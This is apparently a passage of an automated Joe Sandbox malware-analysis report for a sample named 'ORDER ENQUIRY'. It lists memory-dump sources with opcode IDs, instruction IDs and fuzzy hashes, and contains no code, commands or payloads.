                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 08fc8a4b25bf0f49e3a60fb0e16e107fef56b12d51f68ec53295bbfedd139179
                                                                                                                                                                          • Instruction ID: 0717cb5031704b8139eb7b6c4a639871458ef1a5da40cfa0a4711c54ecd70a10
                                                                                                                                                                          • Opcode Fuzzy Hash: 08fc8a4b25bf0f49e3a60fb0e16e107fef56b12d51f68ec53295bbfedd139179
                                                                                                                                                                          • Instruction Fuzzy Hash: 045136716083029FD798DF29C980A6BBBE5FBC8204F44497DF999C7261E730D946CB52
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                          • Instruction ID: f50bb2a4b920a751153a068aa3d4e5b05a99b4a6734d9c195f551125c098c4e0
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                          • Instruction Fuzzy Hash: EC51AF71E0061AABDF15DF98C540BEEBBB5EF49750F054069EA06EB640E734DE44CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                          • Instruction ID: b023c32aca32e355945f9daa4ad2834ccc908c4e7be664a8e7cc1af530cb649f
                                                                                                                                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                          • Instruction Fuzzy Hash: AB51B971D0020AEFDF2A9B94C9C0BAEBB75EB80314F154696E611A7190E730DD558BA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 401b7f0dd59e7d002a046d4bd017b76aee0ca21e6e72098847195ed9999484b4
                                                                                                                                                                          • Instruction ID: a7f6b6fee4a04b99b29dadc8cfaaec1142a8f751672bcdb9faa7ac019007815e
                                                                                                                                                                          • Opcode Fuzzy Hash: 401b7f0dd59e7d002a046d4bd017b76aee0ca21e6e72098847195ed9999484b4
                                                                                                                                                                          • Instruction Fuzzy Hash: FB41F7707016019BEB2DDB2DC898F7BBB9AEF94220F088299E975C7390DB31D841C691
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 42bad84aeea878d6c3958ffce80735be552f1f3f699e33055037484d18138a73
                                                                                                                                                                          • Instruction ID: a9f68e2417738242ba34785bb1b9c76cd36a12d2928980c69184794236c11fe2
                                                                                                                                                                          • Opcode Fuzzy Hash: 42bad84aeea878d6c3958ffce80735be552f1f3f699e33055037484d18138a73
                                                                                                                                                                          • Instruction Fuzzy Hash: 21519CB190021ADFCB24DFA9C98499EBBB9FF88314B95455AE505B3301DB34AD11CFD0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 70c7f97cf10db960cd38e7084ddabd06c6b65cc4f9a83f640463c1ccfbb4310f
                                                                                                                                                                          • Instruction ID: d76caf7bf24d24e467622fe15bf91dccf6cc0eaa00bb25d1da544e806176d7ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 70c7f97cf10db960cd38e7084ddabd06c6b65cc4f9a83f640463c1ccfbb4310f
                                                                                                                                                                          • Instruction Fuzzy Hash: 984137717403129BDB3EEF68D986FAA77B4EB94708F44006DFE069B246D7719804D7A0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                          • Instruction ID: fc375f1d05ebdaa4cae4874aa8656483ee7eddeb173458f571fa92fca24d6368
                                                                                                                                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                          • Instruction Fuzzy Hash: 0541E9716007169FDB6DDF78C980A6EB7A9FF90210B0946AEE96287340EB30ED14C790
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8e8b97293308fb3f90b97b2cab68ae4958d3154dc0a4023fe4a6d956da28939a
                                                                                                                                                                          • Instruction ID: bf41cce94981cc8d921ac655018adba91b9194349f3ebcefa4d4032a01e743aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e8b97293308fb3f90b97b2cab68ae4958d3154dc0a4023fe4a6d956da28939a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D41DD32A0121A9BDB15DF98C644AEEBBF4FF48700F18816AF915F7240D7B49C42CBA4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ff59d1138320aadd76e236b3d06e23770e05082d03889921d88af86c885c3bc9
                                                                                                                                                                          • Instruction ID: 115faa958165001c2ee7c675e40fa43f20015064d1bbc4d374a94ac933cf21ba
                                                                                                                                                                          • Opcode Fuzzy Hash: ff59d1138320aadd76e236b3d06e23770e05082d03889921d88af86c885c3bc9
                                                                                                                                                                          • Instruction Fuzzy Hash: 1541AF712047029FDB24DF28C984A6BB7F9FF88214F45486EE557CB215EB35E849CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                          • Instruction ID: 9f998bd27bb9f99d702bae34b7a622dbe9801f3f4a37a0735d16271c84350220
                                                                                                                                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                          • Instruction Fuzzy Hash: E3516C75A00625CFCB19CFA9C480AADF7B2FF88710F2481A9D929A7751D730EE45CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c2e5c2f8704afd03d68a600eeae80c2a0b3b351ec483225dd78e65bcb521377b
                                                                                                                                                                          • Instruction ID: befe837f54c8ee11db17d66950209993a8be16e54e1ad70e3fce978fdb18bdc5
                                                                                                                                                                          • Opcode Fuzzy Hash: c2e5c2f8704afd03d68a600eeae80c2a0b3b351ec483225dd78e65bcb521377b
                                                                                                                                                                          • Instruction Fuzzy Hash: 4851E6B0D00246DBEB299B68CD40BE8BBB5FF15314F5882EAE519972C2E73499C1CF40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1504a9a5e4ccf0a54f1467bc3082cf54ae393c115c3baf4fd4deee86383fa869
                                                                                                                                                                          • Instruction ID: 67e9a9ca4bde115c35f3b7304483f1ae316e076e22d1311c7afa8f01f2d7b072
                                                                                                                                                                          • Opcode Fuzzy Hash: 1504a9a5e4ccf0a54f1467bc3082cf54ae393c115c3baf4fd4deee86383fa869
                                                                                                                                                                          • Instruction Fuzzy Hash: A7418571A00268DBDB21DF68CA80BEE7BB8EF45750F0505A9E908AB242D774DE84CF51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                          • Instruction ID: fcce3889ff3aa68e4da09e66478dda83c30348049da07c1e36a6847f33601e34
                                                                                                                                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B418575B00105ABDF19DF99CC98AAFBBBAEF88610F1440A9E915E7351DB70DD0187A0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 86355254d38bc14d0b77a24923cf3113e661420b6900dd0dfd2b9303880ec3be
                                                                                                                                                                          • Instruction ID: c456defe6b70f50b71a4ca9ea86ef69e7a370d4bcbf7eb9c62e783666a7a1a7c
                                                                                                                                                                          • Opcode Fuzzy Hash: 86355254d38bc14d0b77a24923cf3113e661420b6900dd0dfd2b9303880ec3be
                                                                                                                                                                          • Instruction Fuzzy Hash: 5841E2B06007819FE325CF68C680A63BBF9FF48314B148A6EE557C7A52E730E845CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b45ae9783807f4d444f3c971b28b59a6706a0a5cb4ad3a5a3c267e07f62a3ee7
                                                                                                                                                                          • Instruction ID: 3c14a9b021a4a1167acea97a770635a893df3e34d039e16f0b402888a331eec6
                                                                                                                                                                          • Opcode Fuzzy Hash: b45ae9783807f4d444f3c971b28b59a6706a0a5cb4ad3a5a3c267e07f62a3ee7
                                                                                                                                                                          • Instruction Fuzzy Hash: 76411132900604CFDF25EF68C5847ED7BB4FF08310F980599D412AB295DB75D900CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: aa496a1ea84045c237fb142b2e5e6aae721d47f3beb6e206e09a10b5c71701ca
                                                                                                                                                                          • Instruction ID: 7366283f3f8e0ad7c4060531bfbcdefa76fef64f3c9a46a7a4ae679e3f225191
                                                                                                                                                                          • Opcode Fuzzy Hash: aa496a1ea84045c237fb142b2e5e6aae721d47f3beb6e206e09a10b5c71701ca
                                                                                                                                                                          • Instruction Fuzzy Hash: A1412671900242CFD724AF4CC9C1AEABBBDFF95704F69802ED5049B25AD77AD801CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d9ca2ba8d8a7e35ef6dcc8faef49c3e65ccea0248acf912a071b034ca0bb7e6e
                                                                                                                                                                          • Instruction ID: 607923711911ec82a996612ebbc05a0bfe93501ac5791db9631c9ad4732c841e
                                                                                                                                                                          • Opcode Fuzzy Hash: d9ca2ba8d8a7e35ef6dcc8faef49c3e65ccea0248acf912a071b034ca0bb7e6e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B416A315087069ED312DF69C940A6BFBE8EF88B54F44092EF984D7250E734DE058B93
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                          • Instruction ID: 704f041475c190599373baccd1ccec3eb3a8f6ef3c600d64a4621f2e0288d8fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                          • Instruction Fuzzy Hash: 03412C35A00211DBDB2BEF598550BBABFB1EB50764F9580AEE9459B280D7339D40CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 810dc22f9d949e338a081096cf8a8fc5dff156f3d1a861fae636367e26844e35
                                                                                                                                                                          • Instruction ID: 11935c09eccb62293366265d39fc90383383903a90a036425137c5d9a67fb64a
                                                                                                                                                                          • Opcode Fuzzy Hash: 810dc22f9d949e338a081096cf8a8fc5dff156f3d1a861fae636367e26844e35
                                                                                                                                                                          • Instruction Fuzzy Hash: C4415B71640641EFD725CF18C980BA6BBF8FF54714F248A6EE449CB292E771E941CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                          • Instruction ID: 216be7656d4844405ff17f2b051853f5939c603ac5b05e44d7294996a1b329b0
                                                                                                                                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                          • Instruction Fuzzy Hash: D5413A71A00705EFDB25CFA8CA94AAABBF4FF18700B10496DE596D7650D370EA44CF50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 298f58c2bbae3e71fdede44227513fbaee8c569ac827ad1c7da0b48132af55db
                                                                                                                                                                          • Instruction ID: 16e1adf9f770c4e908be057ddb3885a2502f3d3cf24e06ed2c25ea920aa5fd61
                                                                                                                                                                          • Opcode Fuzzy Hash: 298f58c2bbae3e71fdede44227513fbaee8c569ac827ad1c7da0b48132af55db
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F41C5B1901745CFC726EF28CA907A9B7B9FF54310F1482AFC4169B2A2DB30A981CF51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7d2cccfb10308fbc4200845de72cf6fb5c9ab91aa6760a70addb566fc0937987
                                                                                                                                                                          • Instruction ID: 89c1aee0af6f832cf0b3353375be86a9c5900ee77b148408e703be7d21fff3bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d2cccfb10308fbc4200845de72cf6fb5c9ab91aa6760a70addb566fc0937987
                                                                                                                                                                          • Instruction Fuzzy Hash: 513189B1A01345DFDB16DFA8D540799BBF0FB09B24F2081AED119EB291D7369902CF90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 90f500db5e9ea54e1db7eb73d810deac70ebec60b9ff8529601da745cb958e1c
                                                                                                                                                                          • Instruction ID: 8a65f884cd0508fe88766cd9955ec4b6f3b3b4a7e0444620888f58df401b3be4
                                                                                                                                                                          • Opcode Fuzzy Hash: 90f500db5e9ea54e1db7eb73d810deac70ebec60b9ff8529601da745cb958e1c
                                                                                                                                                                          • Instruction Fuzzy Hash: FF418CB2504305AFD720EF29C845B9BBBE8FF88764F004A2EF998D7250D7709915CB92
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6b61faafb059b22a65f1406ef71abe1ec48b072113f312e3bbf2da2f6ed0201e
                                                                                                                                                                          • Instruction ID: 92c2ea1b85008f683bb8e2df6a4c691a41317a86f0a25bc25bc1a09d45bdbee1
                                                                                                                                                                          • Opcode Fuzzy Hash: 6b61faafb059b22a65f1406ef71abe1ec48b072113f312e3bbf2da2f6ed0201e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A410371E05716AFCB01DF18CA80AA8BBB5FF44761F54826AD816A7280DB39FD41CBD0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f2c578f3f0d67e8eb11e0c03a9bd5d9928fe880c1ef716c526d270f20ca9a767
                                                                                                                                                                          • Instruction ID: ba5c73de05bd021bf095422b8c4c3983c1dd43a55926518dbc4403d2e5702d1f
                                                                                                                                                                          • Opcode Fuzzy Hash: f2c578f3f0d67e8eb11e0c03a9bd5d9928fe880c1ef716c526d270f20ca9a767
                                                                                                                                                                          • Instruction Fuzzy Hash: 3341C2726086469FC324EF6CC880A7AB7E9FFC8700F14465DF95497680E730E914D7A6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 824c120597ebb1877538e39ebfb75caf71ccf82a6d1a364382c1b1a8c58a8d39
                                                                                                                                                                          • Instruction ID: 6307f5bc0597b41b821b29e8c4fe163c40eeb80330d6159538a23536102952f7
                                                                                                                                                                          • Opcode Fuzzy Hash: 824c120597ebb1877538e39ebfb75caf71ccf82a6d1a364382c1b1a8c58a8d39
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D41D2706043429BDB25DF2CD9C4BAABBE9EF88750F14442DE642CB293DB30D841CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3b70069ce20c59b1e3c2b77f6c99d013aafabc417a585bf3473c8313b51d5294
                                                                                                                                                                          • Instruction ID: e75d6ed2ee85a690ccdd40b172d9c8172cbb9d1e83e3f3f5f237ff8f0c4a85ca
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b70069ce20c59b1e3c2b77f6c99d013aafabc417a585bf3473c8313b51d5294
                                                                                                                                                                          • Instruction Fuzzy Hash: D641A171E01605DFCB15CF69CA809ADBBF1FF88321B54866ED466A72A0DB38A941CF40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                          • Instruction ID: 57af61b1d191fc76e6fe3a12cbea764df48ed9373136e6266d8d54d1e5e0f4be
                                                                                                                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                          • Instruction Fuzzy Hash: D0310235A04244EBDB128BA8CD84BDABFE8AF14750F0841AAF815D7352C7749884CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: da8c5adfbfc4e07e6d9970cffbe70b44d89e6000dd59c41dfcfe3cbb6761e5e3
                                                                                                                                                                          • Instruction ID: 5b2c599e518f172a301707c4aca09ff9c5989357a63d1516390c894a7a5037e3
                                                                                                                                                                          • Opcode Fuzzy Hash: da8c5adfbfc4e07e6d9970cffbe70b44d89e6000dd59c41dfcfe3cbb6761e5e3
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D31B975740706ABDB269F559D41FAFBAB8EF58B50F000068FA00AB291DBA4DD01C7A0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
